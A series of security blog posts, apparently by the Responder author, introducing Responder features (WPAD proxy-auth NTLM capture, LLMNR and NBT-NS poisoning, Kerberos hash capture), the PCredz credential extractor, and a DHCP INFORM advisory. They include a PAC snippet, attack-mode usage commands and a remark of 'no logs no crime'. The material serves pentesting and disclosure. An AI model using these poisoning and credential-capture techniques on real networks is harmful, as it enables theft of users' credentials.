Sunday, September 11, 2016

Introducing Proxy Auth on Responder 2.3.2

Few days ago mubix submitted a feature request on Responder repository
I liked the idea and I started working on it. The concept was to force authentication while a victim would use the WPAD proxy server, but then comes the question: Why would you auth someone on the proxy while you used the option -F to force authentication for wpad.dat file retrieval?

Why not letting anyone get that wpad.dat configuration file for free, no authentication and then use another proxy server (not the wpad server) to force authentication, so Responder doesn't send an HTTP 401 response, but a 407 Proxy Authentication Required and then ditch the connection.

Thanks to PAC files, you can set fail-over proxy servers:

function FindProxyForURL(url, host)
{
if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host))
   return "DIRECT";

if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)"))
   return "DIRECT";

return 'PROXY 10.10.100.10:3128; PROXY 10.10.100.20:3141; DIRECT';
}

The last line means: 

If the proxy server 10.10.100.10:3128 fails, then use this one: 10.10.100.20:3141 and if both fails, use a direct connection to the intranet or internet.

Using this functionality, we can make sure the WPAD server is not working -by not using the -w option- then any workstation using our PAC file will:
  • Connect to 10.10.100.10:3128 and send a request with URL, cookies, headers.
  • The Auth-Proxy module will respond with a 407 and request credentials.
  • The workstation will transparently send its encrypted NTLMv1/NTLMv2 credentials and will get a TCP Reset from the proxy server right after that.
  • This is done by using SO_LINGER which will send a RST as soon as close() is called, faking a proxy server failure.
  • The workstation will then attempt the second proxy server 10.10.100.20:3141 which is offline.
  • Finally the workstation will connect to the internet directly.

The user behind his desk using Internet Explorer has seen nothing and has internet access, we get his NTLM credentials.

This attack is highly effective and is included in the latest version 2.3.2:

https://github.com/lgandx/Responder/

This video demonstrates the concept on a 2012R2 PDC with default settings, someone simply open IE, Responder gets the credentials transparently, no password prompt:


Wednesday, September 30, 2015

Demistifying Responder WPAD Authentication module:

One of the most successful modules in Responder is the WPAD server.

The WPAD functionality can be boiled down this way, there's two issues:
  • WPAD MITM: Anyone on an ISP (like qc.ca) plugged direcly into the modem (WAN), and therefore on the internet, will be vulnerable if someone creates a wpad.qc.ca domain and serve a wpad.dat file to the people looking for it.
  The Web Proxy Autodiscovery Protocol is looking for WPAD.domain.name by default, if there's no answer then it will fall back to Multicast LLMNR and if that fails it will go to broadcast NBT-NS.
  •  WPAD file retrieval: Responder is exploiting the fact that in the Web Proxy Autodiscovery Protocol, HTTP authentication is allowed and supported. Therefore if a workstation is looking for "WPAD" via LLMNR or NBT-NS and someone answers it (multicast/broadcast) using a rogue HTTP authentication server, that workstation will send transparently its sets of credentials.
If a workstation boots up, the machine credentials will be sent. If a user opens up IE on that workstation, Responder will get the encrypted sets of credentials transparently, with obviously no user interaction and no logs. Therefore, no logs no crime, right?
What I just described is the stealthiest way of exploiting and getting encrypted sets of credentials on any workstations ranging from Windows 2000 to 2012R2.

Monday, June 9, 2014

Responder v2.0.9

Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default active directory environment (including Windows 2012) in minutes or hours. Most of the attacks in this tool are hard to detect and are highly successful.

Responder attacks 5 Windows core protocols:
 - LLMNR Poisoning (Windows >=vista).
 - Netbios Name Service Poisoning (NBT-NS poisoning, any by default).
 - WPAD (Any by default).
 - ICMP Redirect (Windows <=2003/XP).
 - DHCP INFORM (Windows <=2003/XP) and ability to perform normal DHCP attacks (Linux, OSX, Windows) [unicast answer].

An extra protocol has been added, for OSX and Linux distributions using avahi: MDNS (Linux, Apple, any .local)

When exploiting these protocol flaws, Responder has its own rogue servers listening:
- SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. This functionality is enabled by default when the tool is launched.

- MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.

- HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can also send your custom files to a victim.

- HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need  to set the -r option for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service  name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added. It containa 2 default keys, including a dummy private key. This is intentional. The purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair.

- LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.

- FTP Auth server. This module will collect FTP clear text credentials.

- Kerberos v5 pre-auth server.

- Small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing, ICMP Redirect, DHCP INFORM.

- WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can send your custom PAC script to a victim and inject HTML into the server's responses. See Responder.conf.

- Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests between systems without poisoning any requests. You can also map domains, MSSQL servers, workstations passively and also see if ICMP Redirects attacks are plausible on your subnet. No port scans.

- POP3 auth server. This module will collect POP3 plaintext credentials

- SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.

- IMAP auth server.

Responder also lets you:

- Customizes your penetration test via Responder.conf.
- Responds to specific in-scope Netbios/LLMNR names.
- Responds to specific in-scope ip addresses.
- Injects SMB share pictures into WPAD responses.
- Replaces requested .exe files with your own, but shown as the original one requested.
- Replaces any requested page with your custom html page, exe file, etc (S-E).
- Set you custom NETNTLM Challenge.

- Logs all its activity to a file: Responder-Session.log.
- All hashes are printed to stdout and dumped in an unique hashcat compliant file using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt. The file will be located in the current folder.
- When the option -f is set, Responder will fingerprint every host that issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.

Usage example:
./Responder.py -i Your_IP_Address -rvF
MUse NBT-NS workstation redirects, be verbose, force WPAD file retrieval authentication

./Responder.py -i Your_IP_Address -A
Analyze mode shows NBT-NS/LLMNR/MDNS queries without responding and finds all MSSQL servers, Workstations, Domains, prints if you can ICMP-Redirect on the subnet. Passive reconnaissance at its best. No port scan, map a network within minutes.

Github:
https://github.com/Spiderlabs/Responder

More info:
- https://github.com/SpiderLabs/Responder/blob/master/README.md
- http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
- http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
- http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
- http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html

Twitter:
- https://twitter.com/PythonResponder

Saturday, June 7, 2014

More on PCredz..

Pcredz was designed to dump useful information on the fly, from a pcap file or from a pcap directory.
Unlike tools like, for example Breachprobe, Pcredz is highly effective and fast just to meet your pentest needs.

What Pcredz does right now from a live interface or pcap file: 
  • Identify Card Holder Data (CHD) on any port.
  • Dump NTLMv1/v2 (DCE-RPC,SMBv1/2,LDAP,MSSQL,HTTP,etc) hashes on any protocol and port.
  • Dump Kerberos (AS-REQ Pre-Auth etype 23) hashes (TCP/UDP 88).
  • Dump HTTP Basic (any port).
  • Dump POP credentials.
  • Dump SMTP credentials.
  • Dump IMAP credentials.
  • Dump SNMP community strings.
  • Dump FTP credentials.
All hashes are displayed in hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).
All credentials are logged to a file (CredentialDump-Session.log).

Pcredz was designed to be highly efficient, specifically with ARP poisoning attacks.
More details and download link:
Github: https://github.com/lgandx/PCredz/

Wednesday, May 28, 2014

Microsoft DHCP INFORM Configuration Overwrite

Title:           Microsoft DHCP INFORM Configuration Overwrite
Version:         1.0
Issue type:      Protocol Security Flaw
Affected vendor: Microsoft
Release date:    28/05/2014
Discovered by:   Laurent Gaffié
Advisory by:     Laurent Gaffié
Issue status:    Patch not available
==============================
=================================================

Summary
-------

A vulnerability in Windows DHCP (http://www.ietf.org/rfc/rfc2131.txt) was found on Windows OS versions
ranging from Windows 2000 through to Windows server 2003.  This vulnerability allows an attacker to remotely
overwrite DNS, Gateway, IP Addresses, routing, WINS server, WPAD, and server configuration with no user
interaction. Successful exploitation of this issue will result in a remote network configuration
overwrite. Microsoft acknowledged the issue but has indicated no plans to publish a patch to resolve it.


Technical details
-----------------

Windows 2003/XP machines are sending periodic DHCP INFORM requests and are not checking if the DHCP INFORM answer (DHCP ACK) is from the registered DHCP server/relay-server. Any local system may respond to these requests and overwrite a Windows 2003/XP network configuration by sending a properly formatted unicast reply.

Impact
------

Successful attempts will overwrite DNS, WPAD, WINS, gateway, and/or routing settings on the target system.

Affected products
-----------------

Windows:
- 2000
- XP
- 2003

Proof of concept
----------------
The DHCP.py utility found within the Responder toolkit can be used to exploit this vulnerability.

git clone https://github.com/Spiderlabs/Responder

Solution
--------
Set a DWORD registry key "UseInform" to "0" in each subfolder found in HKLM\SYSTEM\CCS\Services\TCP\Interfaces\

Response timeline
-----------------
* 18/04/2014 - Vendor notified.
* 18/04/2014 - Vendor acknowledges the advisory ( [MSRC]0050886 )
* 18/04/2014 - Suggested to vendor to run Responder on a A-D environment while looking at the DHCP issue for education purposes. Since multiple attempts were
               made to have them be aware that any A-D environment by default is vulnerable if Responder is running on the subnet. Also, MSRC was asked what
               code change made this DHCP INFORM issue different on Windows Vista than Windows Server 2003.
* 21/04/2014 - MSRC answers with an automated response.
* 08/05/2014 - Request for a reply.
* 14/05/2014 - MSRC reply and refuses to share their view on the code change, however they mention that 'The product team is investigating whether the RFC for
               a DHCPINFORM message is properly implemented'.
* 14/05/2014 - An email was sent to notify MSRC that no code change was requested, but the logic behind it. Also, MSRC was asked if they were successful with
               Responder.
* 16/05/2014 - MSRC closes [MSRC]0050886 and doesn't provide any info on if they were successful with Responder in their environment.


References
----------
* Responder: https://github.com/Spiderlabs/Responder
* https://twitter.com/PythonResponder
* http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html

Wednesday, April 9, 2014

Breaking MSFT Kerberos With Responder

I've been working on a way to get MS Kerberos v5 hashes via the Browser protocol automatically with no user interaction on a given network.
(click on the pics if they don't display correctly).

Often you see these requests in wireshark on an internal penetration test:


So I came up with a tool that automates kerberos' connection for these:


Which shows up like this in Wireshark:


Here's how the attack works :
1) Poison a NBT-NS lookup on the domain controller service, wait for a SamLogonRequest, answer with a LogonSAMUserUnknownEX then wait for a LogonPrimaryQuery and answer with a LogonSAMUserUnknownEX.
2) Setup a smb server which responds to a NegotiateProtocolRequest with the supported mech list set as kerberos:
 
and wait for the Kerberos AS-REQ on UDP 88.

Responder will then take care of the hash parsing and formating:




 And will make it ready for hashcat (-m 7500):

This will be included in the next release of Responder (https://github.com/Spiderlabs/Responder)

Game over MSKerberosV5.


Tuesday, April 8, 2014

Introducing PCredz

PCredz was built to extract credentials from large pcap files or from a live interface.

Stats:

Stats on juicy pcap files:
- 30 mo pcap file : 15s
- 500mo pcap file: 1.5 minutes
- 2 Go pcap file: 7 minutes.

Features:

  • Extract from a pcap file or from a live interface:
    • Credit card numbers
    • POP
    • SMTP
    • IMAP
    • SNMP community string
    • FTP
    • HTTP Basic
    • NTLMv1/v2 (DCE-RPC,SMBv1/2,LDAP, MSSQL, HTTP, etc)
    • Kerberos (AS-REQ Pre-Auth etype 2#) hashes.
  • All hashes are displayed in a hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).
  • Log all credentials to a file (CredentialDump-Session.log).

Install:

  • Linux:
On a debian based OS: apt-get install python-libpcap
  • Os X and other distributions:
wget http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.g
tar xvf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
python setup.py install

Usage:

./Pcredz -f file-to-parse.pcap
./Pcredz -d /tmp/pcap-directory-to-parse/
./Pcredz -i eth0
Options:
-h, --help show this help message and exit
-f capture.pcap Pcap file to parse
-d /home/pnt/pcap/ Pcap directory to parse recursivly
-i eth0 interface for live capture
-v More verbose.


You can download PCredz here:
https://github.com/lgandx/PCredz